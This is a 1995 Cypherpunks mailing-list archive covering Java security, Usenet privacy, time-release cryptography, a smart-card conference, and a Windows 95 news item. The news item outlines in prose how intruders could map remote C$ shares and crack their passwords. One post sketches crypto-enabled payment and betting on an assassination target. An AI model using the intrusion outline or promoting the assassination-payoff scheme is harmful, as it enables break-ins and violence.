From rjc at clark.net Fri Nov 10 16:44:47 1995
From: rjc at clark.net (Ray Cromwell)
Date: Sat, 11 Nov 1995 08:44:47 +0800
Subject: Java insecurity - long - argumentative - you are warned.
In-Reply-To: <9511061047.AA13370@all.net>
Message-ID: <199511062306.SAA13941@clark.net>

>
> WARNING - THIS MESSAGE CONTAINS INFORMATION THAT MIGHT BE CONSIDERED AS
> A FLAME BY SOME READERS - IT IS LONG AND TEDIOUS - YOU ARE WARNED!
>
> >From the Java Web pages (as combined in Firewalls/BoS):
>
> > The language's security features (not just applets):

[Long list of bullshit deleted]

"Dr" Cohen. If you want to criticize Java, why not read the technical papers rather than spewing questions and assertions based from ignorance. When you want to criticize a piece of engineering, you don't look at the feature list or white paper. As is made clear in your post, you don't know the meanings of phrases used in the Java paper, nor do you understand how the machinery works. (e.g. byte code verifier)

-Ray

From roy at cybrspc.mn.org Fri Nov 10 16:44:47 1995
From: roy at cybrspc.mn.org (Roy M.
Silvernail)
Date: Sat, 11 Nov 1995 08:44:47 +0800
Subject: DejaNews all over again--a URL for Usenet Searching
In-Reply-To:
Message-ID: <951106.181650.2r0.rnr.w165w@cybrspc.mn.org>

-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, tcmay at got.net writes:

> I usually avoid passing on URLs of interesting sites, in the name of
> conserving bandwidth (*), but this one really has me jazzed:
>
> http://dejanews.com/

Just a pointer to the thread in comp.society.privacy re the Dejanews "Author Profiles". I expect most any c'punk expects their words to last forever and eventually get cross-referenced, but some people are getting really tweaked about seeing all their posting activity correlated.

- --
Roy M. Silvernail [ ] roy at cybrspc.mn.org
PGP Public Key fingerprint = 31 86 EC B9 DB 76 A7 54 13 0B 6A 6B CC 09 18 B6
Key available from pubkey at cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJ6mmBvikii9febJAQFhywP9H5leIfYlmDABeozti6ZAuT+QG/4kR1Aw
6LGEsVtRmyGY6nyXxJ905TRNHk2jegbR2nXEyXEcB+B5cI9Ef1+wqY7JRlWY90gT
KfaDKSTMMX5clXcy0RqGeXJfOJ2QF7vLAwRV87pCH8kVNStfSeMFiSFZSRc75dP2
s6UrpmF0pPw=
=Wyc3
-----END PGP SIGNATURE-----

From sameer at c2.org Fri Nov 10 16:45:12 1995
From: sameer at c2.org (sameer)
Date: Sat, 11 Nov 1995 08:45:12 +0800
Subject: DejaNews all over again--a URL for Usenet Searching
In-Reply-To:
Message-ID: <199511062347.PAA21652@infinity.c2.org>

> I figured I'd send this to you as a private note, but then I figured
> this thing really is scary and has a lot to do with anonymity.
> Watch out folks. Little Brother is saving everything you've ever said on
> usenet. Your old posts just won't go away.

This is where I step in. ;-) DejaNews will soon be putting up a privacy statement where they refer people to my site if they want privacy. (I haven't checked, it may be up there already.)
>
> (Not that someone who is so open in his views and true name as yourself
> would mind, Tim, but I'm certainly happy for my sake, that alt isn't archived
> yet. It's bad enough they have rec.)
>
> Ps. I will of course run searches on every other address that the who
> command on majordomo at toad.com supplies me with, so watch what you say
> ladies, gents and otherwise. ;->
> Get those 'nyms ready.
>

--
sameer                                  Voice: 510-601-9777
Community ConneXion                     FAX: 510-601-9734
The Internet Privacy Provider           Dialin: 510-658-6376
http://www.c2.org (or login as "guest") sameer at c2.org
"I don't want to get into the t-shirt business."

From carolann at censored.org Fri Nov 10 16:46:43 1995
From: carolann at censored.org (Censored Girls Anonymous)
Date: Sat, 11 Nov 1995 08:46:43 +0800
Subject: Yvette
Message-ID: <199511101724.RAA09597@mailhost1.primenet.com>

Just another Detweiler Tentacle......

Love Always,
Carol Anne
Tentaclefinder

>> I'm wondering if Yvette from Smithfield, Va is as fine as most people say she
>> is...

--
Member Internet Society - Certified BETSI Programmer - Webmistress
***********************************************************************
Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96
My Homepage The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/

From tcmay at got.net Fri Nov 10 17:22:37 1995
From: tcmay at got.net (Timothy C. May)
Date: Sat, 11 Nov 1995 09:22:37 +0800
Subject: coding and nnet's
Message-ID:

At 7:52 PM 11/10/95, Bill Stewart wrote:

>Schneier's 2nd edition says "Neural nets aren't terribly useful for
>cryptography,
>primarily because of the shape of the solution space. Neural nets work
>best for
>problems that have a continuity of solutions, some better than others.
>This allows a neural net to learn, proposing better and better solutions as
>it does.
>Breaking an algorithm provides for very little in the way of learning
>opportunities:
>You either recover the key or you don't. (At least this is true if the
>algorithm is
>any good.) Neural nets work well in structured environments when there is
>something
>to learn, but not in the high-entropy, seemingly random world of cryptography."
>And he doesn't give any references.
 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

This paragraph sounds a _lot_ like what I wrote in sci.crypt a while back on the usefulness of AI and neural nets for crypto. Sounds almost like exactly the paragraph I wrote, in fact. And I recollect that Bruce dropped me a note saying I made the point succinctly and that he wanted to use what I said in his next edition. (My recollection at least, but I don't have any easy way anymore of searching my several hundred megs of accumulated mail, articles, etc.)

I have no problem with Bruce using my points. I hope he didn't use my _exact_ words, though. But not a cosmic issue.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From rah at shipwright.com Fri Nov 10 17:47:12 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Sat, 11 Nov 1995 09:47:12 +0800
Subject: CFP: CARDIS 1996
Message-ID:

Found this in sci.crypt.research. Notice the name at the top of the program committee...
Cheers,
Bob Hettinga

___________________________________________

First Call For Papers

CARDIS 1996
SECOND SMART CARD RESEARCH AND ADVANCED APPLICATION CONFERENCE
September 18-20, 1996, Amsterdam, The Netherlands

AIMS AND GOALS

Smart cards or IC cards offer a huge potential for information processing purposes. The portability and processing power of IC cards allow for highly secure conditional access and reliable distributed information systems. IC cards are already available that can perform highly sophisticated cryptographic computations. The applicability of IC cards is currently limited mainly by our imagination; the information processing power that can be gained by using IC cards remains as yet mostly untapped and is not well understood. Here lies a vast uncovered research area which we are only beginning to assess, and which will have great impact on the eventual success of the technology. The research challenges range from electrical engineering on the hardware side to tailor-made cryptographic applications on the software side, and their synergies.

Many currently existing events are mainly devoted to commercial and application aspects of IC cards. In contrast, the CARDIS conferences aim to bring together researchers who are active in all aspects of design of IC cards and related devices and environment, such as to stimulate synergy between different research communities and to offer a platform for presenting the latest research advances.

CARDIS 1994, sponsored by the International Federation for Information Processing (IFIP) and held in November 1994 in Lille, France, has successfully brought together representatives from leading IC research centers from all over the world. CARDIS 1996 will be the second occasion for the IC card community in this permanent activity. CARDIS 1996 will be organised jointly by the Centre for Mathematics and Computer Science at Amsterdam (CWI) and the Department of Computer Systems of the University of Amsterdam (UvA).
SUBMISSIONS

Submissions will be judged on relevance, originality, significance, correctness, and clarity. Each paper should explain its contribution in both general and technical terms, identifying what has been accomplished, saying why it is significant, and comparing it with previous work. Authors should make every effort to make the technical content of their papers understandable to a broad audience. Papers should be written in English.

Authors should submit:
* 16 copies
* of a full paper
* typeset using the Springer LNCS format (see instructions below)
* not exceeding 20 pages in length
* printed double-sided if possible
* addressed to
    Pieter H. Hartel
    Univ. of Amsterdam
    Dept. of Computer Systems
    Kruislaan 403
    1098 SJ Amsterdam
    The Netherlands

In addition, each submission should be accompanied by information submitted via WWW, (http://www.cwi.nl/~brands/cardis/submit.html) or submitted via email to cardis at fwi.uva.nl that consists of:
* a single postal address and electronic mail address for communication
* complete title, author and affiliation information
* the abstract of the paper
* a small selection of the keywords that appear on this call for papers, which best describe the contribution of the paper

Proceedings will be available at the conference. It is intended to publish the proceedings in the Springer LNCS series. Authors of accepted papers may be expected to sign a copyright release form.
IMPORTANT DATES

Submission deadline       March 1, 1996
Acceptance notification   May 15, 1996
Camera ready paper due    July 1, 1996
Conference                September 18--20 1996

THEMES

Technology/hardware
 1 IC architecture and techniques
 2 Memories and processor design
 3 Read/Write unit engineering
 4 Specific co-processors for cryptography
 5 Biometry
 6 Communication technologies
 7 Interfaces with the user, the service suppliers
 8 Reliability and fault tolerance
 9 Special devices
10 Standards

Software
11 The operating system
12 Models of data management
13 Communication protocols

IC Card design
14 Tools for internal or external software production
15 Validation and verification
16 Methodology for application design

Electronic payment systems
17 Road pricing
18 Internet payment systems
19 Untraceability

Algorithms
20 Formal specification and validation
21 Identification
22 Authentication
23 Cryptographic protocols for IC cards
24 Complexity

Security
25 Models and schemes of security
26 Security interfaces
27 Hardware and software implementation
28 Security of information systems including cards
29 Formal verification of transaction sets
30 Protocol verification

IC Cards, individuals and the society
31 IC cards and privacy
32 Owner access of data
33 IC cards: political and economical aspects
34 Is the IC card going to change legislation?
35 Patents, copyrights

Future of ic cards
36 Innovative technologies
37 Moving towards the pocket intelligence
38 Convergence with portable PCs, lap tops etc ...
39 PCMCIA

Innovative applications
40 Design methodology of applications
41 IC cards and the information system
42 Examples of new applications
43 Requirements for innovative cards

Standards
44 Emerging standards
45 Compliance and approval

ORGANISATION

Steering committee chairman:
  Vincent Cordonnier (Rd2p, Lille)

Local organisation:
  Pieter Hartel (Southampton, UK and UvA, The Netherlands)
  Stefan Brands (CWI, The Netherlands)
  Eduard de Jong (QC consultancy, The Netherlands)

General Chairman:
  Pieter Hartel (Southampton, UK and UvA, The Netherlands)

Program Chairmen:
  Pierre Paradinas (Rd2p, Lille)
  Jean-Jacques Quisquater (Louvain-la-Neuve, Belgium)

Program committee
  Stefan Brands (CWI, Amsterdam)
  André Gamache (Québec, Canada)
  Louis Guillou (CCETT, France)
  Josep Domingo Ferrer (Tarragon, Spain)
  Pieter Hartel (Southampton, UK and UvA, The Netherlands)
  Hans-Joachim Knobloch (Karlsruhe, Germany)
  Pierre Paradinas (Rd2p, France)
  Reinhard Posch (Graz, Austria)
  Jean-Jacques Quisquater (Louvain-la-Neuve, Belgium)
  Matt Robshaw (RSA, inc, USA)
  Bruno Struif (GMD, Germany)
  Doug Tygar (Carnegie-Mellon, USA)

LECTURE NOTES IN COMPUTER SCIENCE

Advice to Authors for the Preparation of Camera-Ready Contributions to LNCS/LNAI Proceedings

The preparation of manuscripts which are to be reproduced by photo-offset requires special care. Manuscripts which are submitted in technically unsuitable form will be returned for retyping or cancelled if the volume otherwise cannot be finished on time. In order to make the volume look as uniform as possible the following instructions should be followed closely.

************

* PRINTING AREA: Using 10-point font size for the main text the printing area should be 12.2 x 19.3 cm. Manuscripts prepared in this preferred format are reproduced in the same size in the book. With these settings, the interline distance should be arranged in such a way that some 42 to 45 lines occur on a full-text page.
* TYPEFACE and SIZE: We recommend the use of Times or one of the similar typefaces widely used in phototypesetting. (In Times and similar typefaces the letters have serifs, i.e., short endstrokes at the head and the foot of letters.) Please do not use a sans-serif typeface for running text, except for computer programs. The text should always be justified to occupy the full line width, so that the right margin is not ragged. For normal text please use 10-point type size and one-line spacing. Small print (abstract and affiliation) should be set in 9-point type size. Please use italic print to emphasize words in running text; bold type in running text and underlining should be avoided. Headings should be capitalized (i.e., nouns, verbs and all other words with at least five letters should have a capital initial) and should, with the exception of the title, be aligned to the left. The font sizes are as follows:

************

Heading level       Example                   Font size and style
Title (centered)    Type Theory               14 point, bold
1st-level heading   1 Introduction            12 point, bold
2nd-level heading   2.1 Simple Connections    10 point, bold
3rd-level heading   Typing Rules.             10 point, bold
4th-level heading   Remarks: (text follows)   10 point, italic

************

* FIGURES: If possible, originals should be pasted into the manuscript and centered between the margins; if no originals of the required size are available, figures may be reduced in scale and pasted into the text. For halftone figures (photos), please forward high-contrast glossy prints and mark the space in the text as well as the back of the photographs clearly, so that there can be no doubt about where or which way up they should be placed. The lettering of figures should be in 10-point font size. Figures should be numbered. The legends also should be centered between the margins and be written in 9-point font size as follows:

(bold) Fig. 3.
(text follows)

* PAGE NUMBERING: Your paper should show no printed page numbers; they are decided by the volume editor and finally inserted by the printer. Please indicate the ordering of your pages by numbering the sheets (using a light blue/green pencil) at the bottom of the reverse side. There also should be no running heads.

* PRINTING QUALITY: For reproduction we need sheets which are printed on one side only. Please use a high-resolution printer, preferably a laser printer with at least 300 dpi or higher resolution if possible. It is desirable that on all pages the text appears in the middle of the sheets.

* REMARK 1: If your typesetting system does not offer the variety of font sizes needed for the preparation of your manuscript according to these instructions, you may choose a different (larger) font size and a correspondingly scaled printing area (12-point font size for the running text, for example, corresponds to a printing area of 15.3 x 24.2 cm and to a final reduction rate of 80%).

* REMARK 2: You are encouraged to use LaTeX or TeX for the preparation of your camera-ready manuscript together with the corresponding Springer style files "llncs" (for LaTeX) or "plncs" (for TeX) to be obtained by e-mail or by ftp/gopher as follows:

Mailserver: Send an e-mail message to svserv at vax.ntp.springer.de containing the line get /tex/latex/llncs.zip for the LaTeX style files or get /tex/plain/plncs.zip for the TeX style files. Sending "help" to the server prompts advice on how to interact with the mail server. The style files have to be unzipped and uu-decoded for use. In case of problems in getting or uu-decoding the style files please contact "springer vax.ntp.springer.de".

Ftp: The internet address is "trick.ntp.springer.de", the user id "ftp" or "anonymous". Please enter your e-mail address as password. The (above mentioned) files reside in "/pub/tex/latex/llncs".

Gopher: Point your client to "trick.ntp.springer.de".
-----------------
Robert Hettinga (rah at shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA
(617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<<

From tcmay at got.net Fri Nov 10 19:52:46 1995
From: tcmay at got.net (Timothy C. May)
Date: Sat, 11 Nov 1995 11:52:46 +0800
Subject: New World Encryption
Message-ID:

At 2:49 AM 11/11/95, James M. Cobb wrote:
>
>
>Friend,
>
>
>An item in 11 09 95 Edupage summarizes a NY Times news
>story revealing Clinton's wish to spy on the world:
>
>OPPOSITION TO ADMINISTRATION'S ENCRYPTION STAND

"Friend,"

I'm sure your intentions are good in forwarding this and other similar items to the Cypherpunks mailing list, but if you are reading the list, you should surely know that this item--including both summaries and the complete article--have already been posted to the Cypherpunks list. Two days ago, in fact.

If for some reason you are _not_ reading the CP list, or not paying attention, then you really should not be forwarding stuff to it.

I'm copying the CP list on this to remind folks to "stay on the page" as to what's already been posted. We are already becoming a kind of "automatic cc:" for a variety of announcements, spams, and other earthshattering items.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."
From jgrubs at left.webcasters.com Fri Nov 10 19:58:25 1995 From: jgrubs at left.webcasters.com (jgrubs at left.webcasters.com) Date: Sat, 11 Nov 1995 11:58:25 +0800 Subject: POTP Security Message-ID: >POTP(tm) Secure FTP version 1.5 for MS Windows >=============================================== > >The first commercially available implementation of our >POTP (Power One Time Pad) encryption algorithm. The package includes >a POTP Secure FTP Client, POTP Secure FTP Server, and POTP FileCrypt - >a stand alone file encryption program. > >Both our client and server support standard ftp, in addition to >absolutely user-transparent encryption on-the-fly of all data >sent/received when connected to a POTP Secure FTP Server/Client. What level of security does this cute, little puppy provide??? From droelke at spirit.aud.alcatel.com Sat Nov 11 14:02:28 1995 From: droelke at spirit.aud.alcatel.com (Daniel R. Oelke) Date: Sat, 11 Nov 95 14:02:28 PST Subject: Who needs time vaults anyway? Message-ID: <9511112202.AA06738@spirit.aud.alcatel.com> > > As for real time-release - how about just using conventional encryption, > and require it to be brute-forced? > > Depending on how fine grained you want the release to be, you could also > take the inverse of Moore's law, work out how big a key you need to have > it unbreakable in less than the desired time, add in whatever fudge > factors you feel like based on how much it would be worth to the opponent > to get early access, then lock up the secret and throw away the key. > The problem here is that it is probabilistic when they are going to be able to unlock it. If the search space will take a total of 10 years to exhaustively search, there is a 50% chance that they will find the key within 5 years, 10% chance that it will be found in 1 year, etc. So, if you are lucky, it will be found in about the time you want it to be. If you aren't, it will be found in a few milli-seconds.
There is also the problem that your intended recipient will need to expend just as much work as your adversary to decrypt the message. This might not be a disadvantage in the case of a "broadcast" message, but otherwise it might be. Good idea - but I would say not practical.... Now, if we just had objects between 1 and 10 light years away that you could bounce lasers off of...... ;-) Dan ------------------------------------------------------------------ Dan Oelke Alcatel Network Systems droelke at aud.alcatel.com Richardson, TX From shields at tembel.org Sat Nov 11 18:15:21 1995 From: shields at tembel.org (Michael Shields) Date: Sat, 11 Nov 95 18:15:21 PST Subject: Who needs time vaults anyway? In-Reply-To: <199511110843.AAA18344@infinity.c2.org> Message-ID: <483l88$1f0@yage.tembel.org> -----BEGIN PGP SIGNED MESSAGE----- In article <199511111953.MAA26503 at nagina.cs.colorado.edu>, Bryce wrote: > A single station could serve up multiple pieces. It would only > reveal the k piece if the querying agent can prove that he has the > k-1 piece. Of course if the total number of stations is small then > the "physically move the pieces" trick might work. But you're back to trusting an agent or device not to reveal a secret. What have you gained? The point about moving the elements of the message physically apart has merit, though. So the one-time pad of timerel, the ideally secure but unworkable model, is to encrypt your message with an OTP, then securely transport the pad and location to points that are $ct$ metres apart, where $t$ is the length of time you want to keep your message secret. You could do this with a reflector $ct/2$ metres away, assuming your opponent and you are in the same location. I suppose this could be useful for very short-term applications (for reference, the diameter of the solar system is about 5.4 light-hours), but like the OTP, its application is limited.
-- Shields. From shields at tembel.org Sat Nov 11 18:25:29 1995 From: shields at tembel.org (Michael Shields) Date: Sat, 11 Nov 95 18:25:29 PST Subject: Who needs time vaults anyway? In-Reply-To: Message-ID: <483lqg$1kt@yage.tembel.org> -----BEGIN PGP SIGNED MESSAGE----- In article , Robert Hettinga wrote: > In the real world, there's a trustee/nominee of some sort who does this. > What's that to keep that from happening on the net, just like our much > maligned (guy's gotta make a living, fer chrissake!) assassination-payoff > escrow agent... Note that with event-release crypto, the houses could make a public key available, with the secret key to be held until the death of Tom Target. That key pair could be used by any of its anonymous buyers while the crypto house remained ignorant not only of the content and authorship of the messages, but even of the messages' existence -- nothing at all to subpoena. The same key could be used by Tom to encrypt his will, by the assassin's employer to encrypt the payment, and by anyone to place a bet on whether Tom will die within a certain period of time (by using ecash that expires, like Digicash). -- Shields. From Anonymous.ReMailer at f21.n216.z1.fidonet.org Sat Nov 11 19:32:32 1995 From: Anonymous.ReMailer at f21.n216.z1.fidonet.org (Anonymous ReMailer) Date: Sat, 11 Nov 95 19:32:32 PST Subject: [NOISE] The State will wither away?
Message-ID: Dale Worley (worley at world.std.com): >It has become fashionable these days to say "The government can't suppress >", usually with the smug implication that the speaker is getting >away with , and thus is more studly than the government. However, >these people are almost always wrong. The correct statement is "The >government isn't willing to expend the effort to suppress ." >Anyone who wishes to disprove this is invited to sell heroin in Singapore. Hey Duncan Frisell! Any kind words for this guy AFA risk assessment? ================================================= This message has been forwarded by an anonymous remailer. It is not from where it appears. For more information, send a message to HELP at 1:216/21. --- ReMail RML00.03 From joelm at eskimo.com Sun Nov 12 07:59:14 1995 From: joelm at eskimo.com (Joel McNamara) Date: Sun, 12 Nov 95 07:59:14 PST Subject: SEMPER Message-ID: <199511121558.HAA27914@mail.eskimo.com> And now for something completely different, a Euro-centric plan for Net digital commerce. Haven't had a chance to look at the URL yet, but obviously crypto-relevant... Joel ---------- Development of Electronic Marketplace: EUROPEAN COMMISSION FUNDS FIRST OPEN SOLUTION FOR SECURE COMMERCE OVER THE INTERNET PRESS RELEASE Zürich, November 2nd, 1995: Backed by the European Commission, a consortium of 20 partners from European industry and academia has embarked on a research project to develop the fundamentals for secure electronic commerce. The goal of the 9-million ECU (approx. 14 million CHF) project, SEMPER (Secure Electronic Marketplace for Europe), is to provide the first open and comprehensive solutions for secure commerce over the Internet and other public information networks. A wide range of businesses are rapidly moving to explore the huge potential of networked information systems, especially with the Internet-based WWW (World-wide Web).
The Internet, which already connects more than 3 million computers and a substantially larger number of users, is growing at a breathtaking pace with thousands of newcomers every day. Although the Internet has its roots in academia and is still dominated by free-of-charge information, dramatic changes are expected in the near future. For instance, the WWW will be used for a wide variety of electronic commerce such as on- line trade or delivery of advanced multimedia information services. The evolution of broadband networks and "information highways" will intensify this trend. The need for secure transactions in this new business environment, which involves networks available to the general public, has triggered a number of related efforts. These initial developments are based almost exclusively in the US and most of them are limited to proprietary, or otherwise closed solutions, involving only electronic payment issues. In contrast, SEMPER is directed towards a comprehensive solution for secure electronic commerce, considering legal, commercial, social, and technical requirements as well as different options for an electronic marketplace. Consistent with its broader goals, the SEMPER project will be managed by an interdisciplinary team of experts from the academic, industrial and general business environment in Europe. The team includes representatives of the social sciences, finance, retail, publishing, as well as in information and telecommunication technology. The first of the three one-year phases will address a coherent security model and a generic, open security architecture for the electronic marketplace. This architecture will be independent of specific hardware, software, or network architectures. The most fundamental electronic commerce services, such as secure offering, order, payment and information delivery, will also be integrated in the first phase. Subsequent phases will concentrate on more advanced services. 
These will include fair exchange of documents, credentials, advanced document processing, notary services and multimedia-specific security services, such as protection of intellectual property rights. Multi-party security and protection of user's privacy will receive prime attention. SEMPER will use and integrate existing architectures, tools, and services where appropriate. Early trials will be provided for WWW, and subsequent tests performed on ATM-based broadband networks to demonstrate the broad applicability of SEMPER's architecture and services. The SEMPER project is part of the Advanced Communication Technologies and Services (ACTS) research program established by the European Commission Directorate General XIII for 1994-1998. ACTS is the follow-on program for Research on Advanced Communications in Europe (RACE) 1987- 1994. The project will establish a Special Interest Group for Secure Electronic Commerce (SIGSEC) which will make results available to all interested parties, including standardisation bodies, and will co-ordinate related projects, in particular those funded by the European Commission. IBM's Zurich Research Laboratory will provide the technical leadership for the SEMPER project, and IBM France will act as co-ordinator. The other members of the consortium are Cryptomathic (DK), DigiCash (NL), EUROCOM EXPERTISE (GR), Europay International (B), FOGRA Forschungsgesellschaft Druck (D), GMD - German National Research Center for Information Technology (D), IBM European Networking Center (D), INTRACOM (GR), KPN Research (NL), Otto-Versand (D), r3 security engineering (CH), SEPT (F), Stichting Mathematisch Centrum / CWI (NL), University of Freiburg (D), University of Hildesheim (D). Banksys (B), Banque Generale du Luxembourg (L) and Telekurs (CH) are associated with SEMPER. For more information please contact Matthias Schunter Philippe Delaoutre Universitaet Hildesheim IBM France Mail: schunter at rz.uni-hildesheim.de Mail: FRIBMSPK at IBM.COM Tel. 
+ 49 5121 883 788 Tel. + 33 1 49 05 61 12 Fax + 49 5121 883 732 Fax + 33 1 47 68 40 33 or see or . From jgrubs at left.webcasters.com Sun Nov 12 08:02:33 1995 From: jgrubs at left.webcasters.com (Jim Grubs W8GRT) Date: Sun, 12 Nov 95 08:02:33 PST Subject: POTP Security In-Reply-To: <4uigeD3w165w@left.webcasters.com> Message-ID: Path: left!jgrubs From: jgrubs at left.webcasters.com (Jim Grubs (W8GRT)) Newsgroups: alt.security.pgp Subject: Re: POTP Security Message-ID: <4uigeD3w165w at left.webcasters.com> Date: Sun, 12 Nov 95 09:17:02 EST References: <70LDeD1w165w at left.webcasters.com> Reply-To: jgrubs at left.webcasters.com (Jim Grubs (W8GRT)) Organization: WebCasters(tm) jgrubs at left.webcasters.com (Jim Grubs (W8GRT)) writes: > > What level of security does this cute, little puppy provide??? > Summary of e-mail responses >--> POOR TO NONE. Thanks, everyone. -- WebCasters(tm) James C. Grubs jgrubs at webcasters.com 6817 Maplewood Avenue Tel.: 419-882-2697 Sylvania, OH 43560 Fax: 419-885-2814 Internet consulting, HTML programming, Information brokering http:://www.webcasters.com/webcasters/ From spjapo at uta.fi Sun Nov 12 09:47:46 1995 From: spjapo at uta.fi (Jaana Segerberg) Date: Sun, 12 Nov 95 09:47:46 PST Subject: (no subject) Message-ID: <199511121747.TAA16827@uta.fi> [Prev][Next][Index] Pornography Server ---------------------------------------------------------------------------- * To: Cypherpunks Mailing List * Subject: Pornography Server * From: "Robert A. Hayden" * Date: Sun, 13 Feb 1994 12:23:28 -0600 (CST) ---------------------------------------------------------------------------- In response to the posting about setting up a pornography server (Sorry, I'm afraid I deleted the specific message so I cannot remember who you was :-). That is certainly a way for people to get and use PGP and to get used the remailers. It would get a lot of heavy use as well. 
Now, if there was a way to batch mailings (so that if, say, six people ordered one item, it would be sent as one letter to all six instead of six different letters, with precedence set to bulk), that would help even more. Now, there are also some practical considerations as well. What materials do you archive? If you put up pictures (gif or jpeg), you will be talking about tremendous amounts of traffic. Once they are uuencoded, even with compression, they can be huge. If you limit yourself to things such as stories and the like, you will have less traffic, but also less use. There is also the legal side of distributing pornography. Interstate transfer is naughty and with Al Gore's Information-Superhighway Patrol, it will raise some very political issues (but, by using a decent blind system, for all the patrol knows, the distributor might be in the recipient's state). Also, and this is really just an interface issue, scripts should be developed that will automate the retrieval process (ie, build and submit the mail message). These would be similiar to the hop.mail or anon.mail scripts, but would be custom to the pornography server. For example: It begins with an input for the file to be retrieved. It will continue prompting for that until the person enters a null (or 'q' or something) It will then list (at least) one dozen remailers, and they can select one (or take a default, and randomize it. Or perhaps randomize it through >1 remailer, although that decreases response time.). They will then have to PGP sign their mail message (so that the ordering software can verify the person placing the order. This is to cut down mail-spoofing to mail-bomb an enemy with porn.) Encrypt it for the appropriate parties Send it on its way. The server can either reply immediately with the appropriate files, or it can batch everything up for processing during low-traffic times (I personally like the first, but dont' really care that much). 
The mail is then PGP encrypted back to the recipient (by getting the key from a key server, or by having the orderee register their key before hand, with the latter probably being easier, although it does leave a paper trail that can be examined) and sent out with precedence set to 'bulk' so that other stuff is more important on the mail links. It should all be fairly accomplishable with a series of perl and sh scripts on either end. The real question is what to offer. I'll talk more about this from an organizational stand-point if anyone is interested. I'm afriad that I'm really not that good a programmer (even of simple shells) as my field of expertise is in management and other administrative stuff (but obviously not spelling :-) ____ Robert A. Hayden <=> hayden at krypton.mankato.msus.edu \ /__ -=-=-=-=- <=> -=-=-=-=- \/ / Finger for Geek Code Info <=> In the United States, they \/ Finger for PGP 2.3a Public Key <=> first came for us in Colorado... -=-=-=-=-=-=-=- (GEEK CODE 1.0.1) GAT d- -p+(---) c++(++++) l++ u++ e+/* m++(*)@ s-/++ n-(---) h+(*) f+ g+ w++ t++ r++ y+(*) ---------------------------------------------------------------------------- * Prev: Re: A possible solution * Next: Pornography Server * Index: Cypherpunks From jamesd at echeque.com Sun Nov 12 17:28:09 1995 From: jamesd at echeque.com (James A. Donald) Date: Mon, 13 Nov 1995 09:28:09 +0800 Subject: ACLU Cyber-Liberties Update: Nov. 8, 1995 Message-ID: <199511111547.HAA08706@blob.best.net> At 05:15 PM 11/8/95 -0500, ACLUNATL at aol.com wrote: > According to the government's own statistics, 1,800 innocent conversations > are intercepted each and every time a wiretap or other form of electronic > surveillance is placed. This seems curiously inefficient, even for government work. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. 
True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From llurch at networking.stanford.edu Sun Nov 12 17:30:05 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Mon, 13 Nov 1995 09:30:05 +0800 Subject: hacker's dream [Win95] In-Reply-To: <9511110629.AA27945@anon.penet.fi> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- This article is basically true. I'm not sure what they mean by "creating a simple file on your local machine," though. Anybody? Microsoft appears to have patched the SMB and C$ bugs, but in the US/English release only. Yusuf Mehdi sent me email Thursday promising that international patches would be available *within two weeks* -- there was no explanation for the delay, and I can think of none. This is discussed a bit in article <4814sh$i3g at Networking.Stanford.EDU> and followups, and a bunch of places on gopher://quixote.stanford.edu/1m/win95netbugs. - -rich On Sat, 11 Nov 1995, jerry the golden retriever wrote: > > Windows 95 Is A Hacker's Dream Over The Internet > CENTRAL, HONG KONG, 1995 NOV 9 (NB) -- Windows 95, combined with the > Internet, could be a dream made in hacker heaven. From seasoned propeller > heads Newsbytes has contacted, it looks like Windows 95 could be more of a > security nightmare than was first thought. > > This is especially true where fixed link companies are concerned. An > investigation of the new operating system, when hooked onto the Internet, > leaves computers wide open. Executing a series of simple, uncomplicated > commands opens up company and private users' computers to hacking the moment > they access the Internet, claim some analysts. > > Worse, they may never know it has been done. Using a simple Unix command, a > hacker can locate the IP (Internet protocol) address of the subscriber logged > into an Internet service provider. Then he needs only one more thing; a > logged-on Internet user using Microsoft's new operating system.
> > For businesses with leased line Internet links, it can happen at any time, > day or night. Once the IP address has been noted, the hacker simply creates a > file through DOS on his own system, specifying the address and naming it. > Using two other commands -- which purge the remote names on the IP, or > Internet provider's port -- the system then refreshes and remaps itself in > preparation to be accessed by the hacker's computer. > > Because Windows 95 is designed with a networking capability, it leaves all > computers in the office open to illegal access. Once the hacker has called up > his Map Network Drive, the hard disk on his own machine cannot be > differentiated from that of the genuine user. All that need be done then is > to put in a common drive name, most obviously "C:\." For networked machines, > the default "C$" is common. > > This gives access to all files on the subscriber's drive. While Windows 95 > allows the user to protect the drive by giving it a password, computer > experts Newsbytes talked to said that device won't necessarily lock out > intruders. Because the operating system has no "audit" trail -- in other > words, it does not log who or how someone is accessing the drive -- a hacker > can spend weeks trying to discover the password. Password search programs, > like Cracker, are readily available and can break through most simple > password sequences. > > (Joel McCormick & I.T. 
